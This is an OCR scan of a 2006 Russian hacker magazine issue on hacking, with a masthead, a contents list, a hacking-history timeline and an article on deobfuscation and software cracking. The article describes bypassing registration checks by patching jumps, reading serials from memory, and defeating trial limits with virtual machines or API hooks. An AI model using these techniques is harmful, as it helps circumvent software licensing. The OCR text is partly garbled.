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Одноядерный процессор - это вчерашний день! 
Уже сегодня возможности ОДНОГО ПК AdvaNT АСЕ на базе нового ДВУХядерного Процессора Intel® 
Pentium® О значительно шире! Новая ДВУХядерная обработка информации дает компьютеру 
дополнительную мощность там, где она нужна. Всего ОДИН компьютер позволяет Вашим детям играть 
в игры, в то время как Вы смотрите фотографии с ПК на экране TV, качаете музыку и наслаждаетесь 
жизнью и общением в ДВА раза больше. 


a PentiumD 
WWW.NT.RU, ТЕЛ.: +(495) 970-1930 | inside™ 


ся товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Intel или ее подразделениям на террит ории С T 


Приветствую. 
Вообще-то здесь должны быть умные мысли. Ум- 
ные мысли в контексте номера: о философии 
взлома, его справедливости, влиянии на энтропию 
Вселенной в целом и законных аспектах незакон- 
ных деяний в частности. Конечно же, на этой стра- 
нице ты не найдешь таких мыслей. Я не буду пи- 
сать про то, что взлом — это образ мыслей. Про 
то, что взлом — это профессия. Взлом — это хоб- 
би, источник дохода, сублимация сексуальной 
энергии. Взлом, как и любое удовольствие, неза- 
конен, аморален и ведет к ожирению :). Поскольку 
умных мыслей не будет, расскажу-ка про дизайн. 
Я видел оформление номера брутальным. Ну, 
сам понимаешь. Кровь, огонь, железо, ядерные 
взрывы, цунами и большие бронированные поезда. 
Не получилось :(. Коллеги говорят мне, что взлом — 
это интеллектуальное занятие и что отражено оно 
должно быть настолько же интеллектуально. Ну и 
ладно. Лаборатория так лаборатория. Наши науч- 
ные сотрудники действительно неплохо постара- 
лись, чтобы написать эти статьи: каждая из них — 
это отдельный лабораторный эксперимент. Конеч- 
но, ни одна морская свинка в процессе не постра- 
дала ;). Вот и все мои умные мысли на сегодня. Я 
пойду откушаю ливерного зельца и попью чая, а чи- 
тателю предлагаю перелистнуть страницу и оку- 
нуться в мир чистейшего абсолютного вЗЛОма :) 


Dr.Klouniz 


ЛАБОРАТОРИЯ 
ВЗЛОМА |/ 


oo ви | — ИВ 


www.xakep.ru 


Мнение редакции не всегда совпадает с мнением авторов. 
Все материалы этого номера представляют собой лишь информацию к размышлению 


Редакция не несет ответственности за незаконные действия, совершенные с ее 
использованием, и возможный причиненный ущерб. 
За перепечатку наших материалов без спроса — преследуем 


РЕДАКЦИЯ 

Главный редактор 

Николай «AvaLANche» Черепанов (avalanche@real.xakep.ru) 
Выпускающие редакторы 

Александр «Dr.Klouniz» Лозовский (alexander@real.xakep.ru) 
Андрей Каролик (andrusha@real.xakep.ru) 

CD/OFFTOPIC 

Иван «SkyWriter» Касатенко (sky@real.xakep.ru) 
Литературный редактор 

Валентина Иванова (valy@real.xakep.ru) 

Арт-директор 

Иван Васин (vasin@real.xakep.ru) 

Дизайнер 

Наталья Жукова (zhukova@real.xakep.ru) 
Цветокорректор 

Александр Киселев 

Фотографы 

Андрей Мохов 

Иван Скориков 


ЕЖЕМЕСЯЧНЫЙ 
ТЕМАТИЧЕСКИЙ 
КОМПЬЮТЕРНЫЙ 
ЖУРНАЛ 

05(66) МАЙ 2006 


РЕКЛАМА 

Директор по рекламе ИД (game)land 
Игорь Пискунов (igor@gameland.ru) 
Руководитель отдела рекламы цифровой группы 
Ольга Басова (olga@gameland.ru) 
Менеджеры отдела 

Ольга Емельянцева (olgaeml@gameland.ru) 
Евгения Горячева (goryacheva@gameland.ru) 
Оксана Алехина (alekhina@gameland.ru) 
Менеджер по работе с сетевыми РА, 
корпоративные продажи 

Максим Григорьев (grigoriev@gameland.ru) 
Трафик-менеджер 

Марья Алексеева (alekseeva@gameland.ru) 
тел.: (495) 935.70.34 

факс: (495) 780.88.24 


РАСПРОСТРАНЕНИЕ 

Директор отдела дистрибуции и маркетинга 
Владимир Смирнов (viadimir@gameland.ru) 

Оптовое распространение 

Андрей Степанов (andrey@gameland.ru) 

Подписка 

Алексей Попов (popov@gameland.ru) 

тел.: (495) 935.70.34 

факс: (495) 780.88.24 


PUBLISHING 

Издатель 

Сергей Покровский (pokrovsky@gameland.ru) 
Редакционный директор 

Александр Сидоровский (sidorovsky@gameland.ru) 
Учредитель 

ООО «Гейм Лэнд» 

Директор 

Дмитрий Агарунов (dmitri@gameland.ru) 
Финансовый директор 

Елена Дианова (dianova@gameland.ru) 


ГОРЯЧАЯ ЛИНИЯ ПО ПОДПИСКЕ 
тел.: 8 (800) 200.3.999 (бесплатно для звонящих из России) 


ДЛЯ ПИСЕМ 

101000, Москва, Главпочтамт, а/я 652, Хакер Спец 
spec@real.xakep.ru 

http:/www.xakep.ru 


Отпечатано в типографии «ScanWeb», Финляндия 
Зарегистрировано в Министерстве Российской Федерации 
по делам печати, телерадиовещанию 

и средствам массовых коммуникаций 

ПИ № 77-12014 от 4 марта 2002 г. 

Тираж 42 000 экземпляров. 

Цена договорная. 


ТЕМА НОМЕРА 


6 МАШИНА ВРЕМЕНИ 


Хакеры на рубеже веков 


8 МИКСТУРА OT ХАКЕРОВ 


Обфускация и ее преодоление 


14 БАЗОВЫЙ ИММУНИТЕТ 


Почему ломают БД 


1 8 ЛАБОРАТОРНАЯ РАБОТА 
Атака на НР и IGRP 


50 ПОДОПЫТНЫЕ ГОЛОВОЛОМКИ 


Снятие {Па|-защиты с онлайн-игр 


54 КЛЮЧЕВОЙ ПРОЦЕСС 


Handango Dynamic Registration. Сам себе генератор 


5 8 .NET CEKPETAM 


Добыча исходного кода приложений 


6 р ТОР 10 
Рейтинг ошибок защитников программ 


6 8 ТЕРМОЯДЕРНЫЙ ИНЛАЙН 


28 ТАЙНЫ ЧЕРНОГО РЫНКА IT 


Темная сторона высоких технологий 


3 A О$Е-АНАЛИЗ 


Разоряем скрытые возможности 05! -модемов 


ДО ИМПЛАНТАНТЫ ПЫШНЫХ ФОРМ 


Искусство редактирования интерфейса программ на УВ 


AA ВСКРЫТИЕ .NET 


Взлом компонентов на практике 


A8 МИКРОСКОПИЧЕСКИЙ АНАЛИЗ 1C 


Получаем доступ к БД с максимальными привилегиями 


12 


Inline-naty приложения для КПК 


ПЕНЕТРАЦИЯ НЕМГОМ 


Взлом в полевых условиях — это стильно! 


SPECIAL DELIVERY 


78 
80 
84 


ОБЗОР КНИГ 


Что полистать 


ПРОВЕРЕНО ЭЛЕКТРОНИКОЙ 


Аудиторы безопасности 


СПРОСИ ЭКСПЕРТА 


«Все зависит от кривизны рук админа» 


ЭКСПЕРТ НОМЕРА 


КОМПАНИЯ 


«АРХОНТ» 


СПЕЦИАЛИЗИРУЕТСЯ 

НА ПРОВЕДЕНИИ АУДИТА 
ИТ-БЕЗОПАСНОСТИ, ОБЕСПЕЧЕНИИ 
МНОГОУРОВНЕВОЙ ЗАЩИТЫ, . 
РАЗРАБОТКЕ И НАСТРОИКЕ СЕТЕИ. 
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МНОГОЧИСЛЕННЫМ ПУБЛИКАЦИЯМ 
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НА КОНФЕРЕНЦИЯХ И РАЗРАБОТКЕ 
РАЗЛИЧНЫХ УТИЛИТ ДЛЯ ПРОВЕРКИ 
БЕЗОПАСНОСТИ 
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GridEX 2000b 


Janus Web Suite 1.5.1015 
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ACID Pro 6.0 


Easy MP3 Alarm Clock 1.0 


Weather Watcher 5.6.7 


AutoHotkey 1.0.43.05 


AntiVir Personal Edition 7 


Keyboard Maniac 


Sony ACID Pro 6.0 Build 214 


Readiris Pro 10 


Opera 9.0 


WIDI 3.2 


Apollo DivX to DVD Creator v2.7.0 


Traffic Counter 1.3 


ОР 2005a Build 7840 


Moffsoft FreeCalc v1.2.06 


CPU-Z v.1.33 


Amust Registry Cleaner v2.1 


+ 
МАРТОВСКИЙ НОМЕР СПЕЦА 
ОБНОВЛЕНИЯ WINDOWS ЗА МЕСЯЦ 


В ПРОБИРКАХ БУЛЬКАЕТ КАКАЯ-ТО 
КРАСНАЯ ЖИДКОСТЬ, В СОЕДИНЕННОЙ 
С НИМИ ПРИЧУДЛИВЫМ ПЕРЕПЛЕТЕНИЕМ 
ТРУБОК РЕТОРТЕ ГРЕЕТСЯ НА 
СПИРТОВКЕ РАСТВОР... КАЗАЛОСЬ БЫ, 
ВСЕ ГОТОВО К ЭКСПЕРИМЕНТУ? 

НЕ ХВАТАЕТ ЛИШЬ ДВУХ ВЕЩЕЙ: 
ЭКСПЕРИМЕНТАТОРА (ТЕБЯ) 

И РЕАКТИВОВ, КОТОРЫХ ПОЛОН ДИСК! 


MULTIBOOTABLE 


Защитный инвентарь 
Инструменты 
Препараторская 
Софт от NoNaMe 

в том числе: 

ACID Pro 6.0 

IDA 5.0 

Opera 9.0 

CPU-Z v.1.33 


Обновления Windows (9x/XP/NT/2000/2003) 
Спец 03(64), Game Coding 


Максима, лЬН, 


ая | 90 км/ч 
Скорость 


Разгон 
9 100 км/ч 
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машина 
времен 


ХАКЕРЫ НА РУБЕЖЕ ВЕКОВ 


МЫ НЕ ПРЕТЕНДУЕМ НА ЗВАНИЕ ТВОЕЙ ЭНЦИКЛОПЕДИИ 
(НАМ ЭТОГО И НЕ НАДО), ТОЛЬКО ХОТИМ НАПОМНИТЬ 

О НЕСКОЛЬКИХ ВЕСЬМА ЗАНЯТНЫХ ДАТАХ И ФАКТАХ, 
МАЛО КОМУ ИЗВЕСТНЫХ |AHAPEM КАРОЛИК (ANDRUSHAGREAL.XAKEP.RU) 


Громкий судебный процесс разыг- 
рывается вокруг Эрика Корли (из- 
вестен и как Эммануэль Голд- 
штейн) — основателя и редактора 
популярного во всем мире хакерс- 
кого журнала «2600» (www.2600.org), 
Эрик обвинялся в том, что опубли- 
ковал на своем сайте исходники 
программы для взлома защитного 
кода О\/О-дисков. Программа извест- 
на как Decode Content Scrambling Sys- 
tem (DeCSS). Эрик проиграл дело... 


Взломан сервер www.mail.ru, хотя 
сложно назвать это взломом, так 
как процедура получения пароля к 
ящику была простой до безобразия 
и практически не требовала ника- 
ких умственных усилий. Хакеры 
воспользовались некорректно спро- 
ектированным механизмом переда- 
чи забытых паролей. При опреде- 
ленной последовательности дейс- 
твий пароль можно было увидеть 
непосредственно в коде сайта. 


На конференции DefCon, которая 
проходила в Лас-Вегасе, американ- 
ские власти задержали Дмитрия 
Склярова. Его обвинили в разра- 
ботке программы Advanced eBook 
Processor, которая позволяла взла- 
мывать защиту «электронных книг» — 
файлов формата еВоок (созданного 
компанией Adobe). Обвинительный 
иск от Adobe содержал пять пунк- 
тов, суд вынес решение о 25-ти го- 
дах лишения свободы и штрафе на 


Гэри Маккиннон из Великобритании 
взломал 97 компьютеров правитель- 
ства США, нанеся ущерб в $70 0000. 
Он уничтожил некоторые файлы, 
что повлияло на работу 2 000 компь- 
ютерных систем министерства обо- 
роны США. Маккиннону грозит срок 
до 70-ти лет (он получит его, если 
будет выдан американцам). Самое 
забавное, что, по словам Гарри, все 
взломы он провел, чтобы доказать 
существование инопланетян. 


Счета 40 миллионов платежных карт 
разных систем подверглись опаснос- 
ти в результате взлома. «Дыра» бы- 
ла обнаружена в системе безопас- 
ности процессингового центра ком- 
пании CardSystems Solutions Inc., ко- 
торая имеет услугу по обслужива- 
нию транзакций платежных систем. 
В компьютерной сети этой компании 
был найден вирус, который перехва- 
тывал передаваемую информацию о 
картодержателях № 


сумму более $2 млн. Программист 
выразил протест, после чего обви- 
нения были перенесены на его ра- 
ботодателя — российскую компа- 
нию «Элкомсофт». 


прогноз погоды 
для хакеров 


> www.void.ru 
Детище российской коман- 
ды Team Void (одними из 
первых составили описание 
тактики «распределенных» 
атак). На сайте публикуются 
статьи о существующих уяз- 
вимостях в программном 
обеспечении и операцион- 
ных системах. Посетители 
сайта имеют доступ к базам 
взломанных сайтов. 


> www.securitylab.ru 

Целиком посвящен пробле- 
ме обеспечения компьютер- 
ной безопасности. Сканеры 
уязвимостей и портов, ме- 
неджеры паролей, компиля- 
торы, сниферы, файрволы 
ит.д. На сайте также пред- 
ставлена русская версия 
проекта OWASP.org, Ежеднев- 
но публикуются новости о 
«дырах», обнаруженных в 
программном обеспечении. 


> www.bugtrack.ru 
Русский BugTrack — один 
из самых старых и популяр- 
ных русскоязычных серве- 
ров по безопасности. На 
сайте собраны материалы, 
посвященные проблемам 
обеспечения безопасности 
информационных систем. 
Есть постоянно растущая 
подборка статей и книг. 


> www.security.nnov.ru 
Авторский проект ЗАРАЗы, 
посвященный информаци- 
онной безопасности. 
Интересны сборник сущест- 
вующих эксплойтов и ново- 
стная лента, в которой пуб- 
ликуются последние най- 
денные уязвимости и ошиб- 
ки в программах. 
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ЗАГЛЯНИ НА НАШ ФОРУМ 


FORUM.XAKEP.RU/FORUM.ASP?FORUMID=17 
И ЗАДАЙ HAM СВОИ ВОПРОСЫ 


> kak говорят медики, СПИД — это еще не 
приговор. То же самое с обфускацией. Далеко не 
каждый обфускатор использует продвинутые ме- 
ТОДИкКи «запутывания», поэтому не нужно высажи- 
ваться на измену, когда слышишь это слово. 

В простейшем случае полиморфный генера- 
тор просто «накачивает» программу кучей ничего 
не значащих команд типа пор, xchg reg,reg, никог- 
да не выполняющимися переходами типа xor 
reg,reg/jnz junk, где хог — значимая команда, a junk — 
«мертвый код». 

Не слишком сложный скрипт для IDA PRO 
найдет все явно незначимые команды и пометит 
их как «мусорные» или же вовсе удалит. Ильфак 
уже давно написал highlighter — плагин, предназ- 
наченный как раз для этой цели. Распространяет- 
ся в исходных текстах на бесплатной основе: 
www.-hexblog.com/ida_pro/files/highlighter.zip _ 

Впрочем, эта бесплатность весьма условна. 
Чтобы скомпилировать плагин, нужен IDA SDK, 
причем не какой-нибудь, а только последней вер- 
сии. Другими словами, большинству пользовате- 
лей IDA Pro не удастся скомпилировать его, но не 
стоит впадать в расстройство: точно такую же 
штуку можно реализовать и самостоятельно, ис- 
пользуя язык скриптов, встроенный в IDA Pro. По- 
тратишь буквально полчаса (сам язык подробно 
описан в книге «Образ мышления — РА РВО», ее 
электронную версию можно бесплатно скачать с 
сервера ftp://nezumi.org.ru) 
> более сложные обфускаторы «перемешива- 
ют» код, закручивая поток управления в запутан- 
ную спираль условных/безусловных переходов, 
использующих технику «перекрытия» команд. Не- 
которые байты принадлежат сразу двум, а в неко- 
торых случаях и трем (!) машинным инструкциям, 
что «ослепляет» дизассемблеры, заставляя их ге- 
нерировать неполный и неправильный листинг. 

Однако в интерактивном режиме (хвала IDA 
Рго) все-таки можно дизассемблировать код, но 
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СОЗДАН ТРОЙКОЙ МАГОВ: MATIAS MAD- 
OU, LUDO VAN PUT И КОЕМ DE BOSSCHERE. 
ЯВЛЯЕТСЯ ПРАКТИЧЕСКИ ЕДИНСТВЕН- 
НЫМ ДОСТУПНЫМ ИНСТРУМЕНТОМ. ДЛЯ 
ПРАКТИЧЕСКОЙ РАБОТЫ ОН НЕПРИГО- 
ДЕН И БОЛЬШЕ НАПОМИНАЕТ ИГРУШКУ, 
СТОЯЩУЮ ТОГО, ЧТОБЫ ПОВОЗИТЬСЯ С НЕЙ. 


очень уж утомительно. Лучше воспользоваться 
трассером, генерирующим листинг реально вы- 
полняемых машинных команд. Заодно избавляем- 
ся от части мусора и «мертвого» кода. 

Обрати внимание на команду «043401 Dh:jmp 
short loc_434013+2», прыгающую по адресу 
434013h+2h == 4340151, то есть в середину ин- 
струкции 434013h:seto bl. Именно что в середину! 
С точки зрения дизассемблера (даже такого про- 
двинутого, как IDA Pro), команда является «ато- 
марной» структурной единицей, то есть недели- 
мой. На самом же деле всякая машинная инструк- 
ция состоит из последовательности байт и может 
быть выполнена с любого места! Во всяком слу- 
чае, х86-процессоры не требуют выравнивания ко- 


ИСХОДНЫЙ КОД (ВМЕСТЕ С ДОКУМЕНТА- 
ЦИЕЙ И КУЧЕЙ ИНТЕРЕСНЫХ СТАТЕЙ НА 
ТЕМУ [ДЕОБФУСКАЦИИ) МОЖНО БЕСПЛАТ- 
НО СКАЧАТЬ С ОФИЦИАЛЬНОГО САЙТА 
DIABLO (www.elis.ugent.be/diablo/?Q=obfuscation). 
ПРАВДА, OH БУДЕТ РАБОТАТЬ ТОЛЬКО 
ПОД UNIX. 
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Внешний вид анализатора LOCO 


да. Другими словами, He существует «команд» — 
существуют только байты. Если начать выполне- 
ние инструкции не с первого байта, получим сов- 
сем другую команду! К сожалению, IDA Pro не по- 
зволяет узнать какую. Чтобы выполнить переход 
«043401Dh:jmp short loc_434013+2», необходимо 
подвести курсор к метке loc_434013 и нажать <U> 
(так мы «раскрошим» дизассемблерный код на 
байты), а после перейти по адресу 4340151 и на- 
жать <С>, тем самым превратив байты в дизас- 
семблерный код. 

На месте seto bl возникла пара инструкций 
jmp loc_43401F/std. Какой из двух листингов пра- 
вильный? По отдельности — ни тот, ни другой. 
Они становятся «правильными» только вдвоем! 
Однако удержать эти подробности в голове нере- 
ально, а IDA Pro не позволяет быстро переключа- 
ться между двумя вариантами. Остается загонять 
«альтернативный» листинг в комментарии. Если 
одна и та же машинная команда имеет три и более 
«точек входа», то комментарии уже не спасают и 
возникает путаница, вынуждающая использовать 
вместо дизассемблера трассер. 
>» — изощренные обфускаторы отслеживают за- 
висимости по данным, внедряя осмысленные ин- 
струкции с «нулевым эффектом». Поясним на кон- 
кретном примере. Допустим, обфускатору встре- 
тилась конструкция: 


оригинальный код до обфускации 


Легко показать, что между последним обращени- 
ем кеах и его реиницилизацией можно как угодно 
модифицировать регистр еах без ущерба для вы- 
полнения программы, поскольку любые операции 
присвоения все равно будут перекрыты командой 
mov eax,ebx. 

Также обфускаторы могут временно сохра- 
нять регистр на стеке, а затем, вволю «поизмывав- 
шись» над ним, восстанавливать прежнее значение. 

Команда MOV EAX,EBB907EBh на первый 
ВЗГЛЯД ВЫГЛЯДИТ «значимой», но на самом деле 
Это «мусор», нейтрализуемый командами push 
eax/pop eax. По сути, весь этот конгломерат произ- 
водит нулевой эффект, то есть является совер- 
шенно бездействующим кодом. Так что делать вы- 
ВОД О «значимости» команд нужно с очень боль- 
шой осторожностью. Пока не будет доказано, что 
данный кусок кода действительно создает какой- 
то эффект, он должен считаться «мусором» по 
умолчанию. 
> некоторые обфускаторы любят внедрять 
подложные расшифровщики, которые расшифро- 
вывают и тут же зашифровывают произвольные 
фрагменты памяти. 

Разумеется, все эти действия вносят побоч- 
ные эффекты (как минимум, воздействуют на 
флаги), и обфускатору приходится выполнять мно- 
жество дополнительных проверок, чтобы убедить- 


ся, что эти побочные действия не окажут рокового 
воздействия на защищаемую программу. Разра- 
ботка качественного и надежного запутывателя — 
сложная инженерная задача, но потраченное вре- 
мя стоит того. Бесполезность «инструкций с нуле- 
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вым эффектом» уже не распознается визуально, 
и обычный трассер тут ничем не поможет. Необхо- 
димо трассировать не только поток управления, но 
и поток данных, то есть отслеживать реальные из- 
менения значений регистров/ячеек памяти, для че- 
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10 ЛАБОРАТОРИЯ ВЗЛОМА 


Попытка взлома Armadill’bi в HIEW’e приводит 
в ужас — код выглядит полной бессмыслицей 


го обычно используются графы. Как только граф 
замыкается сам на себя, все «лишние» операции 
над данными удаляются и остается только суть. 

> более совершенные обфускаторы выполня- 
ют математические преобразования программно- 
го кода, а это кранты. В частности, команда «а++» 
может быть заменена на эквивалентную ей кон- 
струкцию а += (Sin(x)2 + Cos(x)2), где sin/cos вычи- 
CNAIOTCA «вручную» посредством самого «тупого» 
и громоздкого алгоритма, распознать в котором 
исходную формулу не сможет и академик. 

Классические трассеры данных уже не 
справляются с такой задачей: в этом случае граф 
не замыкается сам на себя и избыточность, вне- 
сенная обфускатором, не удаляется. Однако 
можно сделать кое-что в интерактивном режиме. 
Смотри. На входе мы имеем переменную «а», ко- 
торая после долгих и загадочных манипуляций 
увеличивается на единицу. Если код линеен и ин- 
вариантен по отношению к другим данным (то 
есть не зависит от них), хакер может смело заме- 
нить всю эту замутку на «а++». Главное — чтобы 
исследовательский инструмент обеспечивал 
удобный, наглядный и непротиворечивый способ 
визуализации данных. 
>» — чтобы ощутить все прелести обфускации на 
собственной шкуре, достаточно взять Armadillo, 
упаковать свою собственную программу типа Hel- 
lo, world!, а затем ковырнуть ее отладчиком или 
дизассемблером. Мама родная! Сколько ни трас- 
сируй программу, а смысла все равно не видно. 
Попадаешь в окружение кромешной тьмы и непро- 
глядного мрака диких джунглей запутанного кода. 
>  сработающей программы практически всег- 
да можно снять дамп, как бы этому ни сопротив- 
лялся распаковщик. Методики борьбы с распаков- 
щиками довольно разнообразны и заслуживают 
отдельной статьи. Отметим лишь используемый 
Armadillo механизм динамической расшифровки 
СоруМет Il, при котором память расшифровыва- 
ется постранично. 

Armadillo перехватывает обращение к заши- 
фрованной странице через атрибут NO_ACCESS и 
механизм структурных исключений, расшифровы- 
вает ее, а затем зашифровывает вновь. Тем не 
менее, вполне реально написать драйвер, отсле- 
живающий возникновение исключений и дампя- 
щий страницу после завершения ее расшифровки. 


Анализировать «запутанный» код протектора для 
этого совсем не обязательно, но не все и не всег- 
да бывает так радужно... 

Как бы хакер ни избегал анализа запутанно- 
го кода, рано или поздно он вляпается в ситуацию, 
когда полная реконструкция алгоритма будет дей- 
ствительно необходима. Сражение с обфускато- 
ром неизбежно. Раз так, нужно заранее подгото- 
вить себя к нему. 
> написать трассер все равно придется, хотя 
бы чтобы понять, как работает отладчик. Лучше, 
если это будет «термоядерный» Tpaccep, работаю- 
щий на нулевом кольце и обходящий антиотладоч- 
ные приемы, которые так любят использовать об- 
фускаторы. 

Если писать трассер лень, можно использо- 
вать Soft-Ice, просто отключив окно кода командой 
WC. Тогда результат трассировки командой Т бу- 
дет «вываливать» в нижнее окно, откуда его мож- 
но добыть сохранив историю команд в Symbol Lo- 
ader’e: File + Save Soft-Ice History As. 

Намного нагляднее дизассемблерного ли- 
стинга. Теперь не нужно прыгать по условным пе- 
реходам, гадая, какие из них выполняются, а ка- 
кие нет. К тому же естественным образом исче- 
зает проблема перекрытия машинных команд. 
Обрати внимание на адреса 4340121, 004340138 
и 004340161 — это наши «перекрытые» команды. 
То, что дизассемблеру удавалось показать с та- 
ким трудом, трассер отдает нам задаром! Это ре- 
альный поток выполнения программы, в котором 
много мусора, но, по крайней мере, нет скрытых 
команд, с которыми приходится сталкиваться в 
дизассемблере. 

Полученный протокол трассировки можно (и 
нужно!) прогонять через различные программы- 
фильтры (их придется написать тоже самостоя- 
тельно), которые распознают и удаляют мусорные 
инструкции. Впрочем, эту операцию можно вы- 
полнить и вручную, загрузив протокол в любой 
редактор (например, в тот, который встроен в 
FAR). После нескольких минут работы получишь 
реально значимый код. 
> = основную проблему создают циклы. Трассер 
разворачивает их в длинный многокилометровый, 
многократно повторяющийся код. Запаришься 
пролистывать его. Так что не обойтись без филь- 
тра, распознающего и «сворачивающего» повто- 
ряющие конструкции. 

Хорошая идея — пропустить протокол трас- 
сера через оптимизирующий компилятор, исполь- 
зующий системы графов для устранения лишних 
операций присвоения (пропускать именно прото- 
кол трассера, а не дизассемблерный листинг, по- 
скольку последний неверен, неполон и вообще ни- 
куда не годится). Конечно же, он не сможет рас- 
познать математические преобразования в стиле 
эт(х)2+со$(х)2, но выбросит значительную часть 
«инструкций с нулевым эффектом», а тебе не при- 
дется реализовывать систему графов и писать то, 
что было написано задолго до нас. 
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Основной режим работы IDA Pro 5.x 


Трехмерное представление структуры червя 
W32.Bagle очень неудобно для реального анализа 


Правда, есть одно «но». Компиляторы оптимизи- 
руют обращения к памяти с большой осторожно- 
стью, поэтому «ложные» расшифровщики не бу- 
дут оптимизированы компилятором, несмотря на 
их очевидную «нулевую эффективность». Ты дол- 
жен выполнить эту часть работы самостоятельно 
или же... просто смириться с тем, что из листинга 
вычищен не весь мусор. 

> = заоснову лучше всего взять компилятор GCC, 
поскольку его исходные тексты открыты. Разуме- 
ется, просто взять и «оптимизировать» протокол 
трассера не получится — он «написан» на языке 
ассемблера. Можно написать сравнительно про- 
стой транслятор, превращающий дизассемблер- 
ный протокол трассера в программу на С (и тогда 
можно будет оптимизировать ее любым компиля- 
тором, а не только GCC), но лучше оттранслировать 
протокол трассера в промежуточный язык GCC 
(описанный в документации), пропустив его через 
«гнутый» оптимизатор. В этом случае получаешь 
возможность сообщить оптимизатору некоторую 
дополнительную информацию о структуре про- 
граммы, выловленную трассером. Эффективность 
«чистки» кода от этого только повыситься. Короче 
говоря, трассер (и программы-фильтры) будет ра- 
ботать в связке с оптимизатором. 


Там уже и до метадо-декомпилятора недалеко, 
тем более что работы в этом направлении ведутся 
не только в хакерских, но и «академических» кру- 
гах. Так что анализ «запутанного» кода — не та- 
кая уж сложная задача. 

Кстати, процедуры, обработанные обфуска- 
тором, значительно отличаются от всех остальных 
и могут быть найдены простым статистическим 
анализом процентного содержания различных ма- 
шинных команд. У «запутанных» процедур оно бу- 
дет уж очень специфичным. Такие процедуры, как 
правило, до неприличия длинны. Логично, что 
если код процедуры запутан кем-то, то не просто 
так. Здесь явно прячется защитный механизм! 
Процедура проверки регистрационного номера 
или что-то типа того. Обфускация в этом случае 
идет только на пользу хакеру. 
> существуют различные способы анализа ал- 
горитмов работы устройств, «схема» которых не- 
доступна. «Запутанную» программу можно рас- 
сматривать как «черный ящик» со входом и выхо- 
дом, абстрагируясь от машинного кода и выпол- 
няя анализ на гораздо более высоком уровне. 

Много информации несут в себе вызовы API- 
функций (вместе с аргументами и возвращаемы- 
ми значениями). Если хакеру удастся перехватить 
и библиотечные функции вместе с RTL, то картина 
происходящего в общих чертах нарисуется. По 
крайней мере, хакер сможет выяснить, к чему 
«привязывается» защита, и таким образом он уз- 
нает об окончании испытательного периода. Часто 
для взлома большего не нужно. 

Вместо того чтобы анализировать код са- 
мой программы, хакер исследует, каким обра- 
зом она взаимодействует с «внешним миром», 
то есть с ОС. Тогда на «внутренний» мир защи- 
ты можно будет забить. Конечно, не для всех 
программ это срабатывает, но многие ломают- 
ся именно так. 
> грубая ошибка большинства обфускаторов в 
ТОМ, ЧТО, «запутывая» код, они забывают «запу- 
тать» структуру данных (разве что только заши- 
фровывают их). Это позволяет использовать клас- 
сические приемы взлома типа «прямой поиск ре- 
гистрационных данных в памяти». Хакер вводит 


Взлом программы с помощью точек останова в 
Soft-Ice и окна memory 


Листинг 4. Код после обфускации 


Листинг 5. Временное сохранение регистров на стеке с последующим восстановлением 


Листинг 6. «Подложный» расшифровщик, внедренный обфускатором 


произвольный регистрационный номер, отладчи- 
ком находит его в памяти, ставит точку останова и 
всплывает в «запутанной» процедуре, а затем 
смотрит обстоятельства дел. В половине случаев 
после серии долгих разбирательств запутанная 
процедура возвращает TRUE/FALSE, и тогда ха- 
кер просто правит условный переход. 

В другой половине случаев защита генери- 
рует «эталонный» регистрационный номер, легко 
обнаруживаемый визуальным осмотром дампа па- 
мяти (в этом случае хакер просто вводит подсмо- 
тренный номер в программу). Более сложные за- 
щитные механизмы встречаются крайне редко, но 
и тогда часто удается сгенерировать валидный но- 
мер «руками» самой защиты, если она построена 
по схеме if (func_generate_reg_num(user_name) == 


entered_reg_num) all_ok() else fuck_off();. Как He- 
трудно догадаться, хакер находит процедуру 
func_generate_reg_num (по срабатыванию точки 
останова на изег_пате) и «подсматривает» воз- 
вращаемый результат. Данная методика совер- 
шенно «прозрачна» и пробивает любые навесные 
упаковщики, лишний раз подтверждая известный 
тезис о том, что грамотно защитить программу — 
не грибов надербанить :). 

В «тяжелых» случаях помогает слежение за 
данными, то есть, опять-таки — за дампом памяти. 
Хакер включает трассер и вникает в окно Memory, 
анализируя характер изменения переменных. Пе- 
ременные — это ключ ко всему. Они позволяют 
реконструировать алгоритм даже без знания кода. 
Точнее, существуют методики реконструкции кода 


Листинг 7. Протокол трассера 


Листинг 8. «Вычищено» вручную 


Листинг 9. Шпионаж за АР!-функциями несет в себе очень много информации 


по характеру изменения переменных. На данный 
момент они отработаны еще не очень хорошо и 
практически нигде не описаны, но в хакерских ку- 
луарах уже идут оживленные разговоры. Это перс- 
пективное направление, в соответствии с которым 
стоит копать. 

> — возвращаясь к разговору о {"а|-защитах. Мы 
имеем программу, которая запускается по мень- 
шей мере один раз. Где один раз, там и два. Если 
пораскинуть мозгами, можно создать такие усло- 
вия, которые позволят запускать программу не- 
ограниченное множество раз. Грубо говоря, мы 
как бы помещаем программу «под колпак» и под- 
совываем ей те данные, в которых она нуждается 
для продолжения своей жизнедеятельности. 

Известно, что виртуальные машины типа VM 
Ware «автоматически» ломают trial-nporpammMbl. 
Если программа ведет счетчик запусков или запо- 
минает дату инсталляции где-то внутри компьюте- 
ра, то после прекращения работы она устанавли- 
вается на «чистую» виртуальную машину и про- 
должает работать как ни в чем не бывало. Если 
дата окончания испытательного срока жестко про- 
шита внутри программы, часы виртуальной маши- 
ны переводятся «назад», а защита даже не подоз- 
ревает, насколько жестоко ее провели :). Если 
программа «стучится» в интернет, пытаясь под- 
твердить правоверность своей работы, виртуаль- 
ная машина просто «отсекается» от интернета. 
Виртуальные машины — это хорошо, только мед- 
ленно, неудобно и громоздко. 
> можно поступить проще. Достаточно пере- 
хватить базовые АР!-функции для работы с систем- 
ным временем, файловой системой, сетью и рее- 
стром, не забывая о функциях DeviceloControl и по- 
добных ей. Тогда можно организовать «легкую» и 
весьма быстродействующую виртуальную машину, 
подсовывающую защите отдельную файловую си- 
стему и реестр. Кстати, некоторые протекторы «га- 
дят» в реестре, и замуровать их в застенках вирту- 
альной машины сам Джа велел. 

Конечно, это не сработает для тех защит, ко- 
торые работают 30 минут, а затем требуют переза- 
пуска программы, поскольку существует очень 
много способов отсчитать эти 30 минут даже без 
обращения к АР!. Виртуальная машина бессильна 
и в борьбе с надоедливыми МАС-скринами или 
баннерами, которые крутит бесплатная версия 
программы. Однако предложенная методика и не 
претендует на универсальность. Если можно сло- 
мать программу этим путем — хорошо, если нет — 
используй другие пути, атакуя ее по одному из 
сценариев, описанных выше. 

> будущее обфускации готовит хакерам сов- 
сем не радужные перспективы. С ходу можно наз- 
вать трансляторы С-кода в байт-код Машин Тью- 
ринга, Стрелок Пирса, Сетей Петри и многих дру- 
